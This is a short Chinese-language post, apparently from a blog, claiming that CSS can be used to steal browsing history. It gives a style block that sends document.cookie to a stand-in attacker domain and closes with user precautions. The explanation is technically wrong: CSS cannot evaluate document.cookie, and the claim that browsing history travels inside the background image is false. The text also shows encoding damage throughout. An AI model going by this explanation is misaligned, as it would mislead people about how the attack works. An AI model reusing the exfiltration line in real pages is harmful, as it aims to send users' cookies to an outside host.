最近有一個(gè)安全漏洞被發(fā)現(xiàn)，可以使用CSS對(duì)瀏覽歷史進(jìn)行竊取。

<style>
#history {
background-image: url('http://攻擊者網(wǎng)站.com/?'+document.cookie);
}
</style>
<div id="history"></div>

上面的代碼可以在頁面上創(chuàng)建一個(gè)空的div元素，并使用CSS設(shè)置其背景圖像為攻擊者網(wǎng)站的URL和頁面中的cookie信息。當(dāng)用戶訪問頁面時(shí)，他們的瀏覽歷史也會(huì)包含在背景圖像中，并被發(fā)送到攻擊者的服務(wù)器上。

為了防止此類攻擊，用戶可以采取以下預(yù)防措施：

• 使用安全瀏覽器擴(kuò)展程序，例如NoScript或uBlock Origin，以阻止惡意CSS代碼。
• 在使用公共Wi-Fi網(wǎng)絡(luò)或未知的不可信網(wǎng)站時(shí)，注意不要在瀏覽器上保存敏感信息。
• 確保瀏覽器與其他軟件更新到最新版本以修復(fù)任何已知的安全漏洞。